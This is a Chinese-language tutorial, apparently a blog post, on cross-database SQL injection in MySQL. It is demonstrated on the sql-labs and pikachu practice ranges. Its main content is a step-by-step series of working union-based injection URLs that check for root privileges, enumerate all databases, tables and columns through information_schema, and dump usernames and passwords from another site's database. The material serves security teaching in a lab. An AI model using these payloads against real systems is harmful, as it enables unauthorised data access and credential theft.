SQL注入—跨库注入

1.SQL注入—跨库注入

1.1.前言

  该部分补充之前发布的SQL注入基础原理与案例中未提到的跨库注入。后续也会在之前发布过的文章中再逐渐补充未提到内容。
  SQL注入基础原理与案例:参考文章

1.2.跨库注入介绍

  跨库注入首先需要明确注入点的权限，若不是root权限或者管理员权限，那么无法执行跨库注入，只有高权限才能执行跨库注入。
  简单来说，跨库注入就是在同一个数据库管理系统中，在某一个点存在SQL注入，而通过这点查询到，该权限为Root权限，那么就可以使用这种方式去操作同数据库下的其它网站数据库，这样就实现的跨库注入。

2.跨库注入

2.1.跨库注入准备

  这里我们采用联合注入方式进行演示，其它的注入方式都是一样的操作，前提是需要拥有管理员权限。
  同时采用sql-labs靶场来演示，sql-labs靶场安装可以参考以下链接。
  sql-labs靶场安装：靶场安装

2.2.跨库注入流程

  这里前期寻找注入点什么时候都不说了，直接判断并进行测试。

2.2.1.判断是否为管理员权限

  可以看到这里是为root权限，而且当前网站的数据库是security，那么我们该如何进行跨库注入，不过这里我们已经获取到的是管理员权限，那么我们就已经完成了前置条件了。

命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,user(),database()--+

2.2.2.获取数据库下所有库

  这里我们就使用information_schema.schemata获取所有的数据库名，由于在Mysql>5.0版本的时候都会将所有库、所有表、所有列都会放在一张统一的表中，具体的原因还需要去了解数据库，这里我也过多的解释，我们看如何使用即可。

命令：http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+

2.2.3.获取pikachu下的表

  这里我们可以看到，获取到了pikachu数据库，那么我们就读取pikachu数据库下的表。
  需要注意并不是读sql-labs的数据库哦，sql-labs数据库名叫security，而pikachu数据库是pikachu靶场的数据库哦，来实现跨库注入。

命令：http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pikachu'--+

2.2.4.获取pikachu表中列

  这里我们获取pikachu中的users表走的列。

命令：http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='pikachu'--+

2.2.5.获取pikachu列中数据

  这里需要注意，先写数据库名，如何在写数据库表名，例如：数据库名.数据库表名。

命令：http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,username,password from pikachu.users--+